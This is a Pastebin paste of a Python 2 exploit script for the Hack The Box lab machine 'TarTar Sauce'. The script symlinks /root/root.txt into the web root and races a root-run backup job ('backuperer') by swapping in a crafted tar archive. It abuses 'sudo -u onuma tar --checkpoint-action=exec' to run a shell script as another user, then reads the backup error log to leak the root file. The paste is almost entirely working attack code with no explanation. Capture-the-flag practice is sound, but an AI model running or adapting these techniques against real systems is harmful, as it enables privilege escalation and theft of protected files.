Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #HtB.eu TarTar Sauce to root.txt python exploit
- from os import system
- import datetime
- import os
- import subprocess
- import time
- count = 0
- global process_name
- process_name = "backuperer"
- global tarunnin
- tarunnin = "tar"
- global sleepyet
- sleepyet = "sleep"
- global wtdiff
- wtdiff = "diff"
- global maltar
- maltar = "maltar.tar"
- #def cleanup():
- # tmp = os.popen("rm maltar.tar shell.sh")
- # print "clean slate bitches"
- # return
- def create_simlink():
- simlinktest = os.popen("ln -s /root/root.txt /var/www/html/boobies.txt").read()
- simthere = os.popen("ls -a /var/www/html/ | grep -E 'boobies.txt'").read()
- print ("we made " + str(simthere) + " at: " + str(datetime.datetime.now()))
- print ""
- return
- def create_mal_tar():
- tmp = os.popen("tar zvcPf " + maltar + " /var/www/html/").read()
- tmpchk = os.popen("ls -a " + str(maltar)).read()
- print ("file: " + str(tmpchk) + " created at: " + str(datetime.datetime.now()))
- print ""
- return
- def rm_simlink():
- tmp = os.popen("rm /var/www/html/boobies.txt").read()
- tmpchk = os.popen("ls /var/www/html/ |grep boob*").read()
- print ("is there boobie.txt? " + str(tmpchk))
- print ""
- return
- def check_process(prcssname):
- print ("looking for " + prcssname + " at: " + str(datetime.datetime.now()))
- while True:
- tmp = os.popen("ps -e").read()
- if prcssname not in tmp[:]:
- continue
- else:
- dttime = datetime.datetime.now()
- print (prcssname + " ran at: " + str(dttime))
- print ""
- break
- return
- def check_for_tmpfile():
- print "lets find that tmpfile name"
- while True:
- global tmpfile
- tmpfile = os.popen("ls -a /var/tmp |grep -E '[.]\w{10,}'").read()
- if tmpfile == "":
- continue #keep tryin
- else:
- dttime = datetime.datetime.now()
- print (tmpfile + " is the tmpfile name")
- print ("found at: " + str(dttime))
- print ""
- break
- return
- def tmpfile_check():
- print ("tmpfile variable really global? " + str(tmpfile))
- print ""
- return
- def makin_copies(newtar):
- dttime = datetime.datetime.now()
- tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
- print ""
- print ("hash for legit tar: " + str(tmphash))
- print ""
- tmp = "#!/bin/bash"
- print ("makin copies of " + str(newtar) + " at: " + str(dttime))
- tmpsh = os.popen("echo '" + str(tmp) + "' >> shell.sh").read()
- tmpsh = os.popen("echo 'cp " + maltar + " /var/tmp/" + tmpfile + "' >> shell.sh").read()
- tmpsh = os.popen("chmod +x ./shell.sh").read()
- tmpsh = os.popen("sudo -u onuma tar cf /tmp/archive.tar --checkpoint = 1 --checkpoint-action=exec=sh shell.sh").read()
- tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()
- print ("new tar hash: " + str(tmphash))
- print ""
- return
- def sleep_a_sec():
- dttime = datetime.datetime.now()
- print ("waiting 15 sec start now: " + str(dttime))
- time.sleep(15)
- dttime = datetime.datetime.now()
- print ("has it been 5 seconds?" + str(dttime))
- print ""
- return
- def cat_log():
- #tmp = os.popen("cat /var/backups/onuma_backup_error.txt |grep boobies.txt").read()
- tmp = os.popen("tail -n 50 /var/backups/onuma_backup_error.txt | grep \>").read()
- print "hash should be near /"
- print ""
- print str(tmp)
- exit
- #cleanup()
- startshitright = os.popen("rmdir /var/tmp/.b && mkdir /var/tmp/.b && cd /var/tmp/.b").read()
- print "started right"
- create_simlink()
- create_mal_tar()
- rm_simlink()
- check_process(process_name)
- check_process(tarunnin)
- check_process(sleepyet)
- sleep_a_sec()
- check_for_tmpfile()
- #makin_copies(tmpfile)
- check_process(wtdiff)
- #time.sleep(25)
- makin_copies(tmpfile)
- cat_log()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement